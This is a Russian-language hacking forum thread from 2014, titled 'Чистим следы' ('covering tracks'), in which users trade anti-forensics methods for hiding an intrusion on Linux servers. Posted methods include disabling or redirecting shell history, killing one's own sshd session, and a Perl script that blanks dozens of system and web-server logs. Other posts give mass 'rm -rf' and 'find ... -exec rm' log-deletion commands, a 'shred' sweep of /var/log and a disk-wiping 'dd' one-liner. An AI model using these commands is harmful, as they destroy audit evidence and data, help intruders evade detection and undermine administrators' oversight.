Старый 30.07.2014, 16:10   #1
br3d
 
Аватар для br3d
 
Регистрация: 13.03.2012
Сообщений: 10
Репутация: 1
По умолчанию Чистим следы

  • Отключаем историю set +o history (set -o history если надо сново включить)
  • Если не вышло отключить history по хорошему, делаем так ln –s /dev/null .bash_history
  • Если поставить пробел перед командой, то в history она не отобразится
  • Завершаем свой сеанс убийством процесса sshd созданного для нас (kill -9 $$), иначе если закрыть консольное окно или выйти по Ctrl+D останемся в логах
  • Для чистки логов можно использовать whitecat знает большинство путей популярных дистрибов в отличие от других лог клинеров не требует дополнительных либ, компилится без проблем.

У кого есть что дополнить ?

Последний раз редактировалось br3d; 31.07.2014 в 09:41..
br3d вне форума   Ответить с цитированием
Старый 31.07.2014, 12:58   #2
-Gory King-
 
Аватар для -Gory King-
 
Регистрация: 25.07.2010
Сообщений: 36
Репутация: 4
По умолчанию

Код:
@files = qw(
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log.1
/etc/httpd/logs/access_log.2
/etc/httpd/logs/access_log.3
/etc/httpd/logs/access_log.4
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log.1
/etc/httpd/logs/error_log.2
/etc/httpd/logs/error_log.3
/etc/httpd/logs/error_log.4
/usr/local/apache/logs/error_log
/usr/local/apache/logs/suexec_log
/etc/httpd/logs/modsec_audit.log
/etc/httpd/logs/modsec_debug.log
/var/log/httpd/error_log
/var/log/apache2/error.log
/var/log/httpd-error.log
/var/log/mysqld.log
/var/log/secure
/var/log/utmp
/var/log/wtmp
/var/log/yum.log
/var/log/Xorg.0.log
/var/log/wvdialconf.log
/var/log/user.log
/var/log/pycentral.log
/var/log/mail.log
/var/log/apport.log
/var/bootstrap.log
/var/log/daemon.log
/var/log/dpkg.log
/var/log/fontconfig.log
/var/log/lpr.log
/var/log/maillog
/var/log/messages
/usr/local/apache/domlogs/ftpxferlog
/var/log/xferlog
/var/log/chkservd.log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/var/log/auth.log
/var/log/kern.log
/var/log/cron.log
/var/log/boot.log
/var/log/auth.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/nctfpd.errs
/var/log/httpsd/ssl.access_log
/var/log/ncftpd/misclog.txt
/var/log/nctfpd.errs
);
foreach $files (@files){
open (LOG_FILE , "<$files");
print LOG_FILE " ";
}
print "\n\n [+] Server Logs Cleaned Succesfully ! \n\n";
}
-Gory King- вне форума   Ответить с цитированием
Старый 31.07.2014, 15:48   #3
br3d
 
Аватар для br3d
 
Регистрация: 13.03.2012
Сообщений: 10
Репутация: 1
По умолчанию

Хороший список путей для проверки логов !
но, я так понял (перл слабо знаю) он логи полностью трет(
br3d вне форума   Ответить с цитированием
Старый 31.07.2014, 16:36   #4
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

Цитата:
Сообщение от br3d Посмотреть сообщение
Если не вышло отключить history по хорошему, делаем так ln –s /dev/null .bash_history
Так это тоже трет все логи) И как думаешь удивиться админ увидя у себя слинкованные хистори )

Цитата:
не вышло
если не вышло - надо разбираться почему не вышло. В bash, sh и ksh например есть переменная HISTFILE, можно ее исправить, если пустая- то ни куда не пишется.


если все тереть то уж проще и главное надежнее так :
Цитата:
find /var/log/ -type f -exec shred -u {} \;
tex вне форума   Ответить с цитированием
Старый 31.07.2014, 17:22   #5
-Gory King-
 
Аватар для -Gory King-
 
Регистрация: 25.07.2010
Сообщений: 36
Репутация: 4
По умолчанию

Ище вариант
Код:
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout 
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
-Gory King- вне форума   Ответить с цитированием
Старый 01.08.2014, 09:57   #6
madhatter
 
Регистрация: 11.01.2014
Сообщений: 86
Репутация: 1
По умолчанию

Хорошие у вас, однако, способы чистки логов. Нет логов - нет проблем. То есть, вообще нет логов. unset HISTFILE(без $ в начале) и чистка логов клинерами после.
madhatter вне форума   Ответить с цитированием
Старый 01.08.2014, 17:24   #7
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 351
Репутация: 105
По умолчанию

мда...
b3 вне форума   Ответить с цитированием
Старый 01.08.2014, 18:35   #8
Диагноз
 
Регистрация: 11.04.2014
Сообщений: 2
Репутация: 0
По умолчанию

Чищу логи через
Цитата:
dd if=/dev/zero of=/dev/sda
Диагноз вне форума   Ответить с цитированием
Старый 02.08.2014, 09:56   #9
dotr
 
Регистрация: 25.01.2014
Сообщений: 1
Репутация: 0
По умолчанию

Цитата:
Сообщение от -Gory King- Посмотреть сообщение
Ище вариант
Код:
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout 
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
Национальный метод решения проблемы. Вроде все и почищено , но и админ видит что кто-то насрал большую кучу говна...
dotr вне форума   Ответить с цитированием
Старый 04.08.2014, 14:48   #10
br3d
 
Аватар для br3d
 
Регистрация: 13.03.2012
Сообщений: 10
Репутация: 1
По умолчанию

Цитата:
Сообщение от madhatter Посмотреть сообщение
Хорошие у вас, однако, способы чистки логов. Нет логов - нет проблем. То есть, вообще нет логов. unset HISTFILE(без $ в начале) и чистка логов клинерами после.
хотели как лучше, а кончилось как всегда... (
br3d вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd. Перевод: zCarot